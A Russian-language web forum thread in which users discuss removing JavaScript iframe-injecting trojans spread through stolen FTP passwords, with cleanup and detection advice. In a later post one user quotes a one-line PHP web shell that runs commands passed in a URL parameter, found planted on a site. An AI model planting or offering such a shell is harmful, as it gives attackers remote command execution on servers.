Старый 27.12.2007, 19:27   #1 (permalink)
Новичок
 
Регистрация: 27.12.2007
Сообщений: 2
Репутация: 0
По умолчанию троян JS

как мне изгнать трояна с ресурса excellentonline.net ?
mielenyvin вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Старый 27.12.2007, 19:51   #2 (permalink)
Администратор
 
Аватар для Devil
 
Специализация: Кодер
Регистрация: 05.12.2007
Адрес: Москва
Сообщений: 3,695
Репутация: 1724
Номер ICQ 599613
По умолчанию

mielenyvin, привет=) смотря какой троян. Поидее протрояненна была твоя машина, и отсюда уже ты протраянел хостенг. Или, тебе залили шел. Кто твой хостер? попроси его помочь, в конце концов антивирусная защита то, быть должна
__________________
Мы те, кто мы есть
Мой личный блог
Devil вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Старый 27.12.2007, 20:22   #3 (permalink)
Новичок
 
Регистрация: 27.12.2007
Сообщений: 2
Репутация: 0
По умолчанию

привет. провайдеры утверждают, что это вирус, который проникая в систему, заходит под моим логином через фтп, и прописывают себя в виде строки с iframe в моих html файлах. и что типа мне нужно подправить мои хтмлники. но там, в них, если ты посмотришь исходный код - ничего такого нет. у тебя антивирус не орёт?
mielenyvin вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Старый 27.12.2007, 20:59   #4 (permalink)
Администратор
 
Аватар для Devil
 
Специализация: Кодер
Регистрация: 05.12.2007
Адрес: Москва
Сообщений: 3,695
Репутация: 1724
Номер ICQ 599613
По умолчанию

Стоит проверить себя антивирем + вычистить HTML. У тебя стоит какая то CMS, или это просто HTML странички? Вся фишка в том, что у тебя сперли пас (или подобрали если был простой). Пас советую поменять. я тоже пападал на такую штуку по молодости лет Если у тебя CMS то обрати внимание на файл footer (если он есть) если же нет, то как правило такие вещи прописываются только в файлы index(.php .hml . htm . ast .etc). Код вшит именно туда )
__________________
Мы те, кто мы есть
Мой личный блог
Devil вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Старый 14.02.2008, 04:46   #5 (permalink)
Новичок
 
Регистрация: 14.02.2008
Сообщений: 3
Репутация: 3
По умолчанию

Обычно на индексную страницу вконец присобачивают JS закодированный, которы при загрузке создает ифрэйм. У меня даже один таой лежит где-то. Скачал как-то так и не разобрал его по частя.....
akxxiv вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Этот пользователь отблагодарил akxxiv за это сообщение:
Devil (14.02.2008)
Старый 27.02.2008, 19:48   #6 (permalink)
Новичок
 
Регистрация: 25.02.2008
Сообщений: 13
Репутация: 16
По умолчанию Ответ: троян JS

У меня с этим вирусом была встреча Дизайн студия, на которую я работаю была протроянена, у них сперли все пароли к ftp. И начали внедрять js ифреймы, просто ифреймы и даже php какую-то ерунду, сейчас уж не помню. Заражали все индексные файлы(сайтов примерно штук 5-7). Они ко мне, типа убери там, там етот вирус. Я им говорю чистите сначала свою машину, а то это мне работа на всю жизнь. Вы пароли меняете на FTP, их у вас благополучно уводят и опять заражают.
Еще тут статья в "Хакере" попалась - "Гоним траф". Я думаю, ну всё, начинается глобальная ифреймизация интернета. Теперь каждый захочет попробовать.
Пришлось писать что-то типа защиты. Т.е. сначала сайт троянят, а потом я его лечу спец скриптом. Скрипт написал со сл. ф-циями.
1. бэкап всех файлов с возможностью отката к непроифрейменой версии сайта.
2. Поиск по сигнатурам. Т.е. я заношу в файл код этого ифрейма, это типа сигнатура. И потом делаю скан всех файлов сайта на поиск этой сигнатуры. Итого накопилось около 15 разновидностей ифрейма.
3. Просто скан сайта, и выдача результата: какие файлы изменились, были удалены или были добавлены.

Гдето месяца 2 я гонялся за этим ифреймом. Стало уже привычным делом. Потом стихло. Видимо заказчики установили антивирус/фаервол блин. Так вот.
RXcoder вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Этот пользователь отблагодарил RXcoder за это сообщение:
AleX (27.02.2008)
Старый 27.02.2008, 19:56   #7 (permalink)
Новичок
 
Регистрация: 25.02.2008
Сообщений: 13
Репутация: 16
По умолчанию Ответ: троян JS

Мне даже в руки попал такой ифреймер. Он сканирует все директории сайта, ищет файлы по шаблону(значит может не только индексные заражать), в них внедряет код возле тегов <html></head>, <body>, </body>, </html>. Есть даже опция - переписать содержимое файла. + в отдельном файле список акков к ftp.

В ифрейме вы конечно никакого вируса не найдете, он там, куда ведет этот ифрейм.
RXcoder вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
2 пользователя(ей) отблагодарили RXcoder за это сообщение:
AleX (27.02.2008), Devil (28.02.2008)
Старый 28.02.2008, 17:54   #8 (permalink)
Администратор
 
Аватар для Devil
 
Специализация: Кодер
Регистрация: 05.12.2007
Адрес: Москва
Сообщений: 3,695
Репутация: 1724
Номер ICQ 599613
По умолчанию Ответ: троян JS

RXcoder, не приятная вещица, но ещё хуже когда у тебя на фтп в корне воляеться скрипт позволяющий залить тебе любую дрянь и сменить чмоды Это жесть)))
__________________
Мы те, кто мы есть
Мой личный блог
Devil вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Старый 02.03.2008, 07:12   #9 (permalink)
Новичок
 
Регистрация: 25.02.2008
Сообщений: 13
Репутация: 16
По умолчанию Ответ: троян JS

Хе-хе, откуда узнал?
Как-раз валяется. Я его обнаружил с неделю-две назад на сайте всё той-же конторы, но не стал удалять. Скрипт нехитрый:
<? system($_GET['cmd']); ?>
А не стал удалять потому, что сервер работает в безопасном режиме и system() не пашет. Я просто его изменил так, чтоб он вел логи хакерских попыток чегонить натворить.
Но хакер видно его туда залил, попробовал - ничего не работает и забросил. Логи пока пусты.

P.S. Кстате о хакерах. Сейчас можно получить почтовый ящик на Xakep.ru, Кому интересно - забивайте быстрей свои ники пока не заняли.
RXcoder вне форума  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post! Добавить в закладки Google
Ответить с цитированием
Этот пользователь отблагодарил RXcoder за это сообщение:
Devil (02.03.2008)
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
Быстрый переход



Часовой пояс GMT +4, время: 05:24.
Powered by vBulletin® Version 7.51.4
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Web Mastering By Devil Art